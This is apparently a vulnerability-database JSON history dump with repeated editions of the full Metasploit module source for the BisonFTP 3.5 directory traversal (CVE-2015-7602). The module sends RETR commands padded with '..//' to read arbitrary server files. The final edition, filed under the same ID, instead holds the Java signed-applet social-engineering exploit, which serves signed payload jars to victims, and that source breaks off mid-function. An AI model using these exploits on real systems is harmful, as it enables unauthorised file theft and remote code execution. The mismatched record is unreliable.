traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T01:04:59", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T03:07:29", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T03:07:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T03:07:29", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T11:30:40", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T11:30:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-28T11:30:40", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T13:30:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T13:30:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-28T13:30:55", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f4d66f1263e106dbd0d9bb71c33f83d7", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-28T20:21:00", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-28T20:21:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:21:00", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "3f2e63491bfa3e59abbd0619cc80c4c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "Java Signed Applet Social Engineering Code Execution", "description": "This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the \"Publisher\" line. 
Newer JVMs display \"UNKNOWN\" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks \"run\", the applet executes with full user permissions.\n", "published": "2010-12-07T20:43:53", "modified": "2018-03-01T14:41:28", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf"], "cvelist": [], "lastseen": "2019-05-29T04:56:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891806", "OPENVAS:1361412562310891807"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153103", "PACKETSTORM:153104"]}, {"type": "cve", "idList": ["CVE-2019-12378", "CVE-2019-12379", "CVE-2019-12381", "CVE-2019-12383", "CVE-2019-12382", "CVE-2019-12380", "CVE-2019-12372", "CVE-2019-12362", "CVE-2019-12361", "CVE-2019-12360"]}], "modified": "2019-05-29T04:56:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_signed_applet.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include 
Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize( info = {} )\n super( update_info( info,\n 'Name' => 'Java Signed Applet Social Engineering Code Execution',\n 'Description' => %q{\n This exploit dynamically creates a .jar file via the\n Msf::Exploit::Java mixin, then signs the it. The resulting\n signed applet is presented to the victim via a web page with\n an applet tag. The victim's JVM will pop a dialog asking if\n they trust the signed applet.\n\n On older versions the dialog will display the value of CERTCN\n in the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n signature is not trusted (i.e., it's not signed by a trusted\n CA). The SigningCert option allows you to provide a trusted\n code signing cert, the values in which will override CERTCN.\n If SigningCert is not given, a randomly generated self-signed\n cert will be used.\n\n Either way, once the user clicks \"run\", the applet executes\n with full user permissions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'natron' ],\n 'References' =>\n [\n [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]\n ],\n 'Platform' => %w{ java linux osx solaris win },\n 'Payload' => { 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => 'Feb 19 1997'\n ))\n\n register_options( [\n OptString.new('CERTCN', [ true,\n \"The CN= value for the certificate. 
Cannot contain ',' or '/'\",\n \"SiteLoader\"\n ]),\n OptString.new('APPLETNAME', [ true,\n \"The main applet's class name.\",\n \"SiteLoader\"\n ]),\n OptPath.new('SigningCert', [ false,\n \"Path to a signing certificate in PEM or PKCS12 (.pfx) format\"\n ]),\n OptPath.new('SigningKey', [ false,\n \"Path to a signing key in PEM format\"\n ]),\n OptString.new('SigningKeyPass', [ false,\n \"Password for signing key (required if SigningCert is a .pfx)\"\n ]),\n ])\n end\n\n\n def setup\n load_cert\n load_applet_class\n super\n end\n\n\n def on_request_uri( cli, request )\n if not request.uri.match(/\\.jar$/i)\n if not request.uri.match(/\\/$/)\n send_redirect( cli, get_resource() + '/', '')\n return\n end\n\n print_status( \"Handling request\" )\n\n send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\n return\n end\n\n p = regenerate_payload(cli)\n if not p\n print_error(\"Failed to generate the payload.\")\n # Send them a 404 so the browser doesn't hang waiting for data\n # that will never come.\n send_not_found(cli)\n return\n end\n\n # If we haven't returned yet, then this is a request for our applet\n # jar, build one for this victim.\n jar = p.encoded_jar(:random => true)\n\n jar.add_file(\"#{datastore[\"APPLETNAME\"]}.class\", @applet_class)\n\n jar.build_manifest(:main_class => \"metasploit.Payload\", :app_name => \"#{datastore[\"APPLETNAME\"]}\")\n\n jar.sign(@key, @cert, @ca_certs)\n #File.open(\"payload.jar\", \"wb\") { |f| f.write(jar.to_s) }\n\n print_status(\"Sending #{datastore['APPLETNAME']}.jar. 
Waiting for user to click 'accept'...\")\n send_response( cli, jar.to_s, { 'Content-Type' => \"application/octet-stream\" } )\n\n handler( cli )\n\n end\n\n\n def load_applet_class\n data_dir = File.join(Msf::Config.data_directory, \"exploits\", self.shortname)\n if datastore[\"APPLETNAME\"]\n unless datastore[\"APPLETNAME\"] =~ /^[a-zA-Z_$]+[a-zA-Z0-9_$]*$/\n fail_with(Failure::BadConfig, \"APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)\")\n end\n siteloader = File.open(File.join(data_dir, \"SiteLoader.class\"), \"rb\") {|fd| fd.read(fd.stat.size) }\n # Java strings are prefixed with a 2-byte, big endian length\n find_me = [\"SiteLoader\".length].pack(\"n\") + \"SiteLoader\"\n idx = siteloader.index(find_me)\n len = [datastore[\"APPLETNAME\"].length].pack(\"n\")\n # Now replace it with the new class name\n siteloader[idx, \"SiteLoader\".length+2] = len + datastore[\"APPLETNAME\"]\n else\n # Don't need to replace anything, just read it in\n siteloader = File.open(File.join(data_dir, \"SiteLoader.class\"), \"rb\") {|fd| fd.read(fd.stat.size) }\n end\n @applet_class = siteloader\n end\n\n\n def load_cert\n if datastore[\"SigningCert\"]\n cert_str = File.open(datastore[\"SigningCert\"], \"rb\") {|fd| fd.read(fd.stat.size) }\n begin\n pfx = OpenSSL::PKCS12.new(cert_str, datastore[\"SigningKeyPass\"])\n @cert = pfx.certificate\n @key = pfx.key\n @ca_certs = pfx.ca_certs\n\n rescue OpenSSL::PKCS12::PKCS12Error\n # it wasn't pkcs12, try it as concatenated PEMs\n certs = cert_str.scan(/-+BEGIN CERTIFICATE.*?END CERTIFICATE-+/m)\n @cert = OpenSSL::X509::Certificate.new(certs.shift)\n @ca_certs = nil\n while certs.length > 0\n @ca_certs ||= []\n @ca_certs << OpenSSL::X509::Certificate.new(certs.shift)\n end\n\n if datastore[\"SigningKey\"] and File.file?(datastore[\"SigningKey\"])\n key_str = File.open(datastore[\"SigningKey\"], \"rb\") {|fd| fd.read(fd.stat.size) }\n else\n key_str = cert_str\n end\n\n # First try it 
